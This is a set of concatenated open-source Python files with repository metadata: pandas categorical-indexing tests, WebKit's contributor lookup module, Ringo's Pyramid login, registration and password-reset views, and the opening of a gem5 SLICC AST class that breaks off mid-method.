df = DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]}, index=index)
# unique slice
res = df.loc[['a', 'b']]
exp_index = CategoricalIndex(['a', 'b'],
categories=index.categories)
exp = DataFrame({'A': [1, 2], 'B': [4, 5]}, index=exp_index)
tm.assert_frame_equal(res, exp, check_index_type=True)
# duplicated slice
res = df.loc[['a', 'a', 'b']]
exp_index = CategoricalIndex(['a', 'a', 'b'],
categories=index.categories)
exp = DataFrame({'A': [1, 1, 2], 'B': [4, 4, 5]}, index=exp_index)
tm.assert_frame_equal(res, exp, check_index_type=True)
with tm.assert_raises_regex(
KeyError,
'a list-indexer must only include values that are '
'in the categories'):
df.loc[['a', 'x']]
# duplicated categories and codes
index = CategoricalIndex(['a', 'b', 'a'])
df = DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]}, index=index)
# unique slice
res = df.loc[['a', 'b']]
exp = DataFrame({'A': [1, 3, 2],
'B': [4, 6, 5]},
index=CategoricalIndex(['a', 'a', 'b']))
tm.assert_frame_equal(res, exp, check_index_type=True)
# duplicated slice
res = df.loc[['a', 'a', 'b']]
exp = DataFrame(
{'A': [1, 3, 1, 3, 2],
'B': [4, 6, 4, 6, 5
]}, index=CategoricalIndex(['a', 'a', 'a', 'a', 'b']))
tm.assert_frame_equal(res, exp, check_index_type=True)
with tm.assert_raises_regex(
KeyError,
'a list-indexer must only include values '
'that are in the categories'):
df.loc[['a', 'x']]
# contains unused category
index = CategoricalIndex(
['a', 'b', 'a', 'c'], categories=list('abcde'))
df = DataFrame({'A': [1, 2, 3, 4], 'B': [5, 6, 7, 8]}, index=index)
res = df.loc[['a', 'b']]
exp = DataFrame({'A': [1, 3, 2], 'B': [5, 7, 6]},
index=CategoricalIndex(['a', 'a', 'b'],
categories=list('abcde')))
tm.assert_frame_equal(res, exp, check_index_type=True)
res = df.loc[['a', 'e']]
exp = DataFrame({'A': [1, 3, np.nan], 'B': [5, 7, np.nan]},
index=CategoricalIndex(['a', 'a', 'e'],
categories=list('abcde')))
tm.assert_frame_equal(res, exp, check_index_type=True)
# duplicated slice
res = df.loc[['a', 'a', 'b']]
exp = DataFrame({'A': [1, 3, 1, 3, 2], 'B': [5, 7, 5, 7, 6]},
index=CategoricalIndex(['a', 'a', 'a', 'a', 'b'],
categories=list('abcde')))
tm.assert_frame_equal(res, exp, check_index_type=True)
with tm.assert_raises_regex(
KeyError,
'a list-indexer must only include values '
'that are in the categories'):
df.loc[['a', 'x']]
def test_get_indexer_array(self):
arr = np.array([Timestamp('1999-12-31 00:00:00'),
Timestamp('2000-12-31 00:00:00')], dtype=object)
cats = [Timestamp('1999-12-31 00:00:00'),
Timestamp('2000-12-31 00:00:00')]
ci = CategoricalIndex(cats,
categories=cats,
ordered=False, dtype='category')
result = ci.get_indexer(arr)
expected = np.array([0, 1], dtype='intp')
tm.assert_numpy_array_equal(result, expected)
def test_getitem_with_listlike(self):
# GH 16115
cats = Categorical([Timestamp('12-31-1999'),
Timestamp('12-31-2000')])
expected = DataFrame([[1, 0], [0, 1]], dtype='uint8',
index=[0, 1], columns=cats)
dummies = pd.get_dummies(cats)
result = dummies[[c for c in dummies.columns]]
assert_frame_equal(result, expected)
def test_ix_categorical_index(self):
# GH 12531
df = DataFrame(np.random.randn(3, 3),
index=list('ABC'), columns=list('XYZ'))
cdf = df.copy()
cdf.index = CategoricalIndex(df.index)
cdf.columns = CategoricalIndex(df.columns)
expect = Series(df.loc['A', :], index=cdf.columns, name='A')
assert_series_equal(cdf.loc['A', :], expect)
expect = Series(df.loc[:, 'X'], index=cdf.index, name='X')
assert_series_equal(cdf.loc[:, 'X'], expect)
exp_index = CategoricalIndex(list('AB'), categories=['A', 'B', 'C'])
expect = DataFrame(df.loc[['A', 'B'], :], columns=cdf.columns,
index=exp_index)
assert_frame_equal(cdf.loc[['A', 'B'], :], expect)
exp_columns = CategoricalIndex(list('XY'),
categories=['X', 'Y', 'Z'])
expect = DataFrame(df.loc[:, ['X', 'Y']], index=cdf.index,
columns=exp_columns)
assert_frame_equal(cdf.loc[:, ['X', 'Y']], expect)
# non-unique
df = DataFrame(np.random.randn(3, 3),
index=list('ABA'), columns=list('XYX'))
cdf = df.copy()
cdf.index = CategoricalIndex(df.index)
cdf.columns = CategoricalIndex(df.columns)
exp_index = CategoricalIndex(list('AA'), categories=['A', 'B'])
expect = DataFrame(df.loc['A', :], columns=cdf.columns,
index=exp_index)
assert_frame_equal(cdf.loc['A', :], expect)
exp_columns = CategoricalIndex(list('XX'), categories=['X', 'Y'])
expect = DataFrame(df.loc[:, 'X'], index=cdf.index,
columns=exp_columns)
assert_frame_equal(cdf.loc[:, 'X'], expect)
expect = DataFrame(df.loc[['A', 'B'], :], columns=cdf.columns,
index=CategoricalIndex(list('AAB')))
assert_frame_equal(cdf.loc[['A', 'B'], :], expect)
expect = DataFrame(df.loc[:, ['X', 'Y']], index=cdf.index,
columns=CategoricalIndex(list('XXY')))
assert_frame_equal(cdf.loc[:, ['X', 'Y']], expect)
def test_read_only_source(self):
# GH 10043
rw_array = np.eye(10)
rw_df = DataFrame(rw_array)
ro_array = np.eye(10)
ro_array.setflags(write=False)
ro_df = DataFrame(ro_array)
assert_frame_equal(rw_df.iloc[[1, 2, 3]], ro_df.iloc[[1, 2, 3]])
assert_frame_equal(rw_df.iloc[[1]], ro_df.iloc[[1]])
assert_series_equal(rw_df.iloc[1], ro_df.iloc[1])
assert_frame_equal(rw_df.iloc[1:3], ro_df.iloc[1:3])
assert_frame_equal(rw_df.loc[[1, 2, 3]], ro_df.loc[[1, 2, 3]])
assert_frame_equal(rw_df.loc[[1]], ro_df.loc[[1]])
assert_series_equal(rw_df.loc[1], ro_df.loc[1])
assert_frame_equal(rw_df.loc[1:3], ro_df.loc[1:3])
def test_reindexing(self):
# reindexing
# convert to a regular index
result = self.df2.reindex(['a', 'b', 'e'])
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan],
'B': Series(list('aaabbe'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['a', 'b'])
expected = DataFrame({'A': [0, 1, 5, 2, 3],
'B': Series(list('aaabb'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['e'])
expected = DataFrame({'A': [np.nan],
'B': Series(['e'])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['d'])
expected = DataFrame({'A': [np.nan],
'B': Series(['d'])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
# since we are actually reindexing with a Categorical
# then return a Categorical
cats = list('cabe')
result = self.df2.reindex(Categorical(['a', 'd'], categories=cats))
expected = DataFrame({'A': [0, 1, 5, np.nan],
'B': Series(list('aaad')).astype(
'category', categories=cats)}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(Categorical(['a'], categories=cats))
expected = DataFrame({'A': [0, 1, 5],
'B': Series(list('aaa')).astype(
'category', categories=cats)}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['a', 'b', 'e'])
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan],
'B': Series(list('aaabbe'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['a', 'b'])
expected = DataFrame({'A': [0, 1, 5, 2, 3],
'B': Series(list('aaabb'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['e'])
expected = DataFrame({'A': [np.nan],
'B': Series(['e'])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
# give back the type of categorical that we received
result = self.df2.reindex(Categorical(
['a', 'd'], categories=cats, ordered=True))
expected = DataFrame(
{'A': [0, 1, 5, np.nan],
'B': Series(list('aaad')).astype('category', categories=cats,
ordered=True)}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(Categorical(
['a', 'd'], categories=['a', 'd']))
expected = DataFrame({'A': [0, 1, 5, np.nan],
'B': Series(list('aaad')).astype(
'category', categories=['a', 'd'
])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
# passed duplicate indexers are not allowed
pytest.raises(ValueError, lambda: self.df2.reindex(['a', 'a']))
# args NotImplemented ATM
pytest.raises(NotImplementedError,
lambda: self.df2.reindex(['a'], method='ffill'))
pytest.raises(NotImplementedError,
lambda: self.df2.reindex(['a'], level=1))
pytest.raises(NotImplementedError,
lambda: self.df2.reindex(['a'], limit=2))
def test_loc_slice(self):
# slicing
# not implemented ATM
# GH9748
pytest.raises(TypeError, lambda: self.df.loc[1:5])
# result = df.loc[1:5]
# expected = df.iloc[[1,2,3,4]]
# assert_frame_equal(result, expected)
def test_boolean_selection(self):
df3 = self.df3
df4 = self.df4
result = df3[df3.index == 'a']
expected = df3.iloc[[]]
assert_frame_equal(result, expected)
result = df4[df4.index == 'a']
expected = df4.iloc[[]]
assert_frame_equal(result, expected)
result = df3[df3.index == 1]
expected = df3.iloc[[0, 1, 3]]
assert_frame_equal(result, expected)
result = df4[df4.index == 1]
expected = df4.iloc[[0, 1, 3]]
assert_frame_equal(result, expected)
# since we have an ordered categorical
# CategoricalIndex([1, 1, 2, 1, 3, 2],
# categories=[3, 2, 1],
# ordered=True,
# name=u'B')
result = df3[df3.index < 2]
expected = df3.iloc[[4]]
assert_frame_equal(result, expected)
result = df3[df3.index > 1]
expected = df3.iloc[[]]
assert_frame_equal(result, expected)
# unordered
# cannot be compared
# CategoricalIndex([1, 1, 2, 1, 3, 2],
# categories=[3, 2, 1],
# ordered=False,
# name=u'B')
pytest.raises(TypeError, lambda: df4[df4.index < 2])
pytest.raises(TypeError, lambda: df4[df4.index > 1])
def test_indexing_with_category(self):
# https://github.com/pandas-dev/pandas/issues/12564
# consistent result if comparing as Dataframe
cat = DataFrame({'A': ['foo', 'bar', 'baz']})
exp = DataFrame({'A': [True, False, False]})
res = (cat[['A']] == 'foo')
tm.assert_frame_equal(res, exp)
cat['A'] = cat['A'].astype('category')
res = (cat[['A']] == 'foo')
tm.assert_frame_equal(res, exp)
|
bsd-3-clause
|
StevenBlack/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/config/committers.py
|
121
|
11526
|
# Copyright (c) 2011, Apple Inc. All rights reserved.
# Copyright (c) 2009, 2011, 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# WebKit's Python module for committer and reviewer validation.
import fnmatch
import json
from webkitpy.common.editdistance import edit_distance
from webkitpy.common.memoized import memoized
from webkitpy.common.system.filesystem import FileSystem
# The list of contributors has been moved to contributors.json
class Contributor(object):
def __init__(self, name, email_or_emails, irc_nickname_or_nicknames=None):
assert(name)
assert(email_or_emails)
self.full_name = name
if isinstance(email_or_emails, str):
self.emails = [email_or_emails]
else:
self.emails = email_or_emails
self.emails = map(lambda email: email.lower(), self.emails) # Emails are case-insensitive.
if isinstance(irc_nickname_or_nicknames, str):
self.irc_nicknames = [irc_nickname_or_nicknames]
else:
self.irc_nicknames = irc_nickname_or_nicknames
self.can_commit = False
self.can_review = False
def bugzilla_email(self):
# FIXME: We're assuming the first email is a valid bugzilla email,
# which might not be right.
return self.emails[0]
def __str__(self):
return unicode(self).encode('utf-8')
def __unicode__(self):
return '"%s" <%s>' % (self.full_name, self.emails[0])
def contains_string(self, search_string):
string = search_string.lower()
if string in self.full_name.lower():
return True
if self.irc_nicknames:
for nickname in self.irc_nicknames:
if string in nickname.lower():
return True
for email in self.emails:
if string in email:
return True
return False
def matches_glob(self, glob_string):
if fnmatch.fnmatch(self.full_name, glob_string):
return True
if self.irc_nicknames:
for nickname in self.irc_nicknames:
if fnmatch.fnmatch(nickname, glob_string):
return True
for email in self.emails:
if fnmatch.fnmatch(email, glob_string):
return True
return False
class Committer(Contributor):
def __init__(self, name, email_or_emails, irc_nickname=None):
Contributor.__init__(self, name, email_or_emails, irc_nickname)
self.can_commit = True
class Reviewer(Committer):
def __init__(self, name, email_or_emails, irc_nickname=None):
Committer.__init__(self, name, email_or_emails, irc_nickname)
self.can_review = True
class CommitterList(object):
# Committers and reviewers are passed in to allow easy testing
def __init__(self,
committers=[],
reviewers=[],
contributors=[]):
# FIXME: These arguments only exist for testing. Clean it up.
if not (committers or reviewers or contributors):
loaded_data = self.load_json()
contributors = loaded_data['Contributors']
committers = loaded_data['Committers']
reviewers = loaded_data['Reviewers']
self._contributors = contributors + committers + reviewers
self._committers = committers + reviewers
self._reviewers = reviewers
self._contributors_by_name = {}
self._accounts_by_email = {}
self._accounts_by_login = {}
@staticmethod
@memoized
def load_json():
filesystem = FileSystem()
json_path = filesystem.join(filesystem.dirname(filesystem.path_to_module('webkitpy.common.config')), 'contributors.json')
contributors = json.loads(filesystem.read_text_file(json_path))
return {
'Contributors': [Contributor(name, data.get('emails'), data.get('nicks')) for name, data in contributors['Contributors'].iteritems()],
'Committers': [Committer(name, data.get('emails'), data.get('nicks')) for name, data in contributors['Committers'].iteritems()],
'Reviewers': [Reviewer(name, data.get('emails'), data.get('nicks')) for name, data in contributors['Reviewers'].iteritems()],
}
def contributors(self):
return self._contributors
def committers(self):
return self._committers
def reviewers(self):
return self._reviewers
def _name_to_contributor_map(self):
if not len(self._contributors_by_name):
for contributor in self._contributors:
assert(contributor.full_name)
assert(contributor.full_name.lower() not in self._contributors_by_name) # We should never have duplicate names.
self._contributors_by_name[contributor.full_name.lower()] = contributor
return self._contributors_by_name
def _email_to_account_map(self):
if not len(self._accounts_by_email):
for account in self._contributors:
for email in account.emails:
assert(email not in self._accounts_by_email) # We should never have duplicate emails.
self._accounts_by_email[email] = account
return self._accounts_by_email
def _login_to_account_map(self):
if not len(self._accounts_by_login):
for account in self._contributors:
if account.emails:
login = account.bugzilla_email()
assert(login not in self._accounts_by_login) # We should never have duplicate emails.
self._accounts_by_login[login] = account
return self._accounts_by_login
def _committer_only(self, record):
if record and not record.can_commit:
return None
return record
def _reviewer_only(self, record):
if record and not record.can_review:
return None
return record
def committer_by_name(self, name):
return self._committer_only(self.contributor_by_name(name))
def contributor_by_irc_nickname(self, irc_nickname):
for contributor in self.contributors():
# FIXME: This should do case-insensitive comparison or assert that all IRC nicknames are in lowercase
if contributor.irc_nicknames and irc_nickname in contributor.irc_nicknames:
return contributor
return None
def contributors_by_search_string(self, string):
glob_matches = filter(lambda contributor: contributor.matches_glob(string), self.contributors())
return glob_matches or filter(lambda contributor: contributor.contains_string(string), self.contributors())
def contributors_by_email_username(self, string):
string = string + '@'
result = []
for contributor in self.contributors():
for email in contributor.emails:
if email.startswith(string):
result.append(contributor)
break
return result
def _contributor_name_shorthands(self, contributor):
if ' ' not in contributor.full_name:
return []
split_fullname = contributor.full_name.split()
first_name = split_fullname[0]
last_name = split_fullname[-1]
return first_name, last_name, first_name + last_name[0], first_name + ' ' + last_name[0]
def _tokenize_contributor_name(self, contributor):
full_name_in_lowercase = contributor.full_name.lower()
tokens = [full_name_in_lowercase] + full_name_in_lowercase.split()
if contributor.irc_nicknames:
return tokens + [nickname.lower() for nickname in contributor.irc_nicknames if len(nickname) > 5]
return tokens
def contributors_by_fuzzy_match(self, string):
string_in_lowercase = string.lower()
# 1. Exact match for fullname, email and irc_nicknames
account = self.contributor_by_name(string_in_lowercase) or self.contributor_by_email(string_in_lowercase) or self.contributor_by_irc_nickname(string_in_lowercase)
if account:
return [account], 0
# 2. Exact match for email username (before @)
accounts = self.contributors_by_email_username(string_in_lowercase)
if accounts and len(accounts) == 1:
return accounts, 0
# 3. Exact match for first name, last name, and first name + initial combinations such as "Dan B" and "Tim H"
accounts = [contributor for contributor in self.contributors() if string in self._contributor_name_shorthands(contributor)]
if accounts and len(accounts) == 1:
return accounts, 0
# 4. Finally, fuzzy-match using edit-distance
string = string_in_lowercase
contributorWithMinDistance = []
minDistance = len(string) / 2 - 1
for contributor in self.contributors():
tokens = self._tokenize_contributor_name(contributor)
editdistances = [edit_distance(token, string) for token in tokens if abs(len(token) - len(string)) <= minDistance]
if not editdistances:
continue
distance = min(editdistances)
if distance == minDistance:
contributorWithMinDistance.append(contributor)
elif distance < minDistance:
contributorWithMinDistance = [contributor]
minDistance = distance
if not len(contributorWithMinDistance):
return [], len(string)
return contributorWithMinDistance, minDistance
def contributor_by_email(self, email):
return self._email_to_account_map().get(email.lower()) if email else None
def contributor_by_name(self, name):
return self._name_to_contributor_map().get(name.lower()) if name else None
def committer_by_email(self, email):
return self._committer_only(self.contributor_by_email(email))
def reviewer_by_email(self, email):
return self._reviewer_only(self.contributor_by_email(email))
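# A minimal, self-contained sketch (an illustration, not part of webkitpy) of the
# fuzzy-matching idea used in contributors_by_fuzzy_match() above: a candidate only
# counts as a match when its edit distance to the query is at most roughly half the
# query length, and ties are collected rather than resolved arbitrarily.
def _levenshtein(a, b):
    # Classic dynamic-programming edit distance.
    previous_row = list(range(len(b) + 1))
    for i, char_a in enumerate(a, 1):
        current_row = [i]
        for j, char_b in enumerate(b, 1):
            current_row.append(min(previous_row[j] + 1,
                                   current_row[j - 1] + 1,
                                   previous_row[j - 1] + (char_a != char_b)))
        previous_row = current_row
    return previous_row[-1]
def fuzzy_pick(query, candidate_names):
    best, best_distance = [], len(query) // 2 - 1
    for name in candidate_names:
        distance = _levenshtein(name.lower(), query.lower())
        if distance == best_distance:
            best.append(name)
        elif distance < best_distance:
            best, best_distance = [name], distance
    return best, best_distance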
|
bsd-3-clause
|
Intevation/ringo
|
ringo/views/auth.py
|
3
|
13434
|
import uuid
import logging
import pyramid.httpexceptions as exc
from pyramid.security import remember, forget
from pyramid.view import view_config
from pyramid.httpexceptions import HTTPFound
from formbar.config import Config, load
from formbar.form import Form, Validator
from ringo.lib.sql import DBSession
from ringo.model.user import USER_GROUP_ID, USER_ROLE_ID
from ringo.lib.helpers import import_model
from ringo.views.users import (
password_minlength_validator,
password_nonletter_validator
)
from ringo.lib.helpers.appinfo import get_app_title
from ringo.lib.helpers.misc import dynamic_import
from ringo.lib.form import get_path_to_form_config
from ringo.lib.security import login as user_login, request_password_reset, \
password_reset, activate_user, encrypt_password, AuthentificationException
from ringo.lib.message import Mailer, Mail
User = import_model('ringo.model.user.User')
Usergroup = import_model('ringo.model.user.Usergroup')
Role = import_model('ringo.model.user.Role')
log = logging.getLogger(__name__)
def is_login_unique(field, data):
"""Validator function as helper for formbar validators"""
users = DBSession.query(User).filter_by(login=data[field]).all()
return len(users) == 0
def is_registration_enabled(settings):
return (bool(settings.get('mail.host')) and
bool(settings.get('mail.default_sender')) and
settings.get('auth.register_user') == "true")
def is_pwreminder_enabled(settings):
return (bool(settings.get('mail.host')) and
bool(settings.get('mail.default_sender')) and
settings.get('auth.password_reminder') == "true")
def is_authcallback_enabled(settings):
return bool(settings.get('auth.callback'))
@view_config(route_name='login', renderer='/auth/login.mako')
def login(request):
_ = request.translate
settings = request.registry.settings
config = Config(load(get_path_to_form_config('auth.xml')))
form_config = config.get_form('loginform')
form = Form(form_config, csrf_token=request.session.get_csrf_token(),
translate=_)
if request.POST:
form.validate(request.params)
username = form.data.get('login')
password = form.data.get('pass')
user = user_login(username, password)
if user is None:
msg = _("Login failed!")
request.session.flash(msg, 'error')
elif not user.activated:
msg = _("Login failed!")
request.session.flash(msg, 'error')
target_url = request.route_path('accountdisabled')
return HTTPFound(location=target_url)
else:
# Handle authentication callback.
if is_authcallback_enabled(settings):
authenticated = False
try:
callback = dynamic_import(settings.get("auth.callback"))
callback(request, user)
authenticated = True
except AuthentificationException as e:
msg = e.message
request.session.flash(msg, 'critical')
else:
authenticated = True
if authenticated:
# Delete old session data and begin with new fresh session.
request.session.invalidate()
msg = _("Login was successfull")
request.session.flash(msg, 'success')
headers = remember(request, user.id)
target_url = request.route_path('home')
return HTTPFound(location=target_url, headers=headers)
return {'form': form.render(),
'registration_enabled': is_registration_enabled(settings),
'pwreminder_enabled': is_pwreminder_enabled(settings)}
@view_config(route_name='logout', renderer='/auth/logout.mako')
def logout(request):
_ = request.translate
target_url = request.route_path('home')
if request.params.get('autologout'):
target_url = request.route_path('autologout')
return HTTPFound(location=target_url)
elif request.user:
log.info("Logout successfull '%s'" % (request.user.login))
msg = _("Logout was successfull")
headers = forget(request)
request.session.flash(msg, 'success')
return HTTPFound(location=target_url, headers=headers)
return HTTPFound(location=target_url)
@view_config(route_name='autologout', renderer='/auth/autologout.mako')
def autologout(request):
# For the first call the user is still authenticated. So
# delete the auth cookie and trigger a redirect calling the same
# page.
if request.user:
headers = forget(request)
target_url = request.route_path('autologout')
if request.user.login != request.registry.settings.get("auth.anonymous_user"):
log.info("Autologout successfull '%s'" % (request.user.login))
return HTTPFound(location=target_url, headers=headers)
# User is not authenticated here anymore. So simply render the
# logout page.
_ = request.translate
return {"_": _}
@view_config(route_name='accountdisabled', renderer='/auth/disabled.mako')
def accountdisabled(request):
_ = request.translate
return {"_": _}
@view_config(route_name='register_user',
renderer='/auth/register_user.mako')
def register_user(request):
settings = request.registry.settings
if not is_registration_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
config = Config(load(get_path_to_form_config('auth.xml')))
form_config = config.get_form('register_user')
form = Form(form_config, csrf_token=request.session.get_csrf_token(),
translate=_)
# Do extra validation which is not handled by formbar.
# Is the login unique?
login_unique_validator = Validator('login',
_('There is already a user with this '
'name'),
is_login_unique)
pw_len_validator = Validator('pass',
_('Password must be at least 12 characters '
'long.'),
password_minlength_validator)
pw_nonchar_validator = Validator('pass',
_('Password must contain at least 2 '
'non-letters.'),
password_nonletter_validator)
form.add_validator(login_unique_validator)
form.add_validator(pw_len_validator)
form.add_validator(pw_nonchar_validator)
registration_complete = False
if request.POST:
if form.validate(request.params):
# 1. Create user. Do not activate him. Default role is user.
ufac = User.get_item_factory()
user = ufac.create(None, form.data)
# Set login from formdata
user.login = form.data['login']
# Encrypt password and save
user.password = encrypt_password(form.data['pass'])
            # Deactivate the user. To activate the account, the user needs
            # to confirm via the activation link.
user.activated = False
atoken = str(uuid.uuid4())
user.activation_token = atoken
# Set profile data
user.profile[0].email = form.data['_email']
# 2. Set user group
gfac = Usergroup.get_item_factory()
default_grps = settings.get("auth.register_user_default_groups",
str(USER_GROUP_ID))
for gid in [int(id) for id in default_grps.split(",")]:
group = gfac.load(gid)
user.groups.append(group)
# 3. Set user role
rfac = Role.get_item_factory()
default_roles = settings.get("auth.register_user_default_roles",
str(USER_ROLE_ID))
for rid in [int(id) for id in default_roles.split(",")]:
role = rfac.load(rid)
user.roles.append(role)
# Set default user group.
request.db.add(user)
# 4. Send confirmation email. The user will be activated
# after the user clicks on the confirmation link
mailer = Mailer(request)
recipient = user.profile[0].email
subject = _('Confirm user registration')
values = {'url': request.route_url('confirm_user', token=atoken),
'app_name': get_app_title(),
'email': settings['mail.default_sender'],
'login': user.login,
'_': _}
mail = Mail([recipient],
subject,
template="register_user",
values=values)
mailer.send(mail)
msg = _("User has been created and a confirmation mail was sent"
" to the users email adress. Please check your email.")
request.session.flash(msg, 'success')
registration_complete = True
return {'form': form.render(), 'complete': registration_complete}
@view_config(route_name='confirm_user',
renderer='/auth/confirm_user.mako')
def confirm_user(request):
settings = request.registry.settings
if not is_registration_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
success = False
token = request.matchdict.get('token')
user = activate_user(token, request.db)
if user:
success = True
msg = _("The user has beed successfull confirmed.")
else:
msg = _("The user was not confirmed. Maybe the confirmation"
" token was not valid or the user is already confirmed?")
return {'msg': msg, 'success': success}
@view_config(route_name='forgot_password',
renderer='/auth/forgot_password.mako')
def forgot_password(request):
settings = request.registry.settings
if not is_pwreminder_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
config = Config(load(get_path_to_form_config('auth.xml')))
form_config = config.get_form('forgot_password')
form = Form(form_config, csrf_token=request.session.get_csrf_token(),
translate=_)
complete = False
msg = None
if request.POST:
if form.validate(request.params):
username = form.data.get('login')
user = request_password_reset(username, request.db)
if user and user.profile[0].email:
recipient = user.profile[0].email
mailer = Mailer(request)
token = user.reset_tokens[-1]
subject = _('Password reset request')
values = {'url': request.route_url('reset_password',
token=token),
'app_name': get_app_title(),
'email': settings['mail.default_sender'],
'username': username,
'_': _}
mail = Mail([recipient],
subject,
template="password_reset_request",
values=values)
mailer.send(mail)
log.info(u"Passwort reset token sent to "
u"user {} with email {}".format(username, recipient))
else:
log.info(u"Failed sending Passwort reset token for {}. "
u"User not found or missing email".format(username))
            # Return a message to the user that does not reveal whether
            # the given user account exists.
msg = _("If the user has been found together with configured "
"e-mail, a confirmation mail for resetting the password "
"has been sent. Please check your e-mail box.")
request.session.flash(msg, 'success')
complete = True
return {'form': form.render(), 'complete': complete, 'msg': msg}
@view_config(route_name='reset_password',
renderer='/auth/reset_password.mako')
def reset_password(request):
settings = request.registry.settings
if not is_pwreminder_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
success = False
token = request.matchdict.get('token')
user, password = password_reset(token, request.db)
if password:
mailer = Mailer(request)
recipient = user.profile[0].email
        subject = _('Password has been reset')
values = {'password': password,
'app_name': get_app_title(),
'email': settings['mail.default_sender'],
'_': _}
mail = Mail([recipient],
subject,
template="password_reminder",
values=values)
mailer.send(mail)
msg = _("Password was resetted and sent to the users email address."
" Please check your email.")
success = True
else:
msg = _("Password was not resetted. Maybe the request"
" token was not valid?")
return {'msg': msg, 'success': success}
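# A minimal sketch (an assumption, not shipped with ringo) of an "auth.callback" hook
# as consumed by login() above: the dotted path configured under the "auth.callback"
# setting is resolved with dynamic_import and called as callback(request, user);
# raising AuthentificationException vetoes the login and flashes its message.
# Example setting (hypothetical module path): auth.callback = mypackage.auth.require_verified_email
def require_verified_email(request, user):
    if not user.profile[0].email:
        raise AuthentificationException("Login denied: no e-mail address on file.")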
|
gpl-2.0
|
xiaoyuanW/gem5
|
src/mem/slicc/ast/ActionDeclAST.py
|
60
|
3453
|
# Copyright (c) 1999-2008 Mark D. Hill and David A. Wood
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.ast.DeclAST import DeclAST
from slicc.symbols import Action, Type, Var
class ActionDeclAST(DeclAST):
def __init__(self, slicc, ident, pairs, statement_list):
super(ActionDeclAST, self).__init__(slicc, pairs)
self.ident = ident
self.statement_list = statement_list
def __repr__(self):
return "[ActionDecl: %r]" % (self.ident)
def generate(self):
resources = {}
machine = self.symtab.state_machine
if machine is None:
self.error("Action declaration not part of a machine.")
if self.statement_list:
# Add new local vars
self.symtab.pushFrame()
addr_type = self.symtab.find("Address", Type)
if addr_type is None:
self.error("Type 'Address' not declared.")
var = Var(self.symtab, "address", self.location, addr_type,
"addr", self.pairs)
self.symtab.newSymbol(var)
if machine.TBEType != None:
var = Var(self.symtab, "tbe", self.location, machine.TBEType,
"m_tbe_ptr", self.pairs)
self.symtab.newSymbol(var)
if machine.EntryType != None:
var = Var(self.symtab, "cache_entry", self.location,
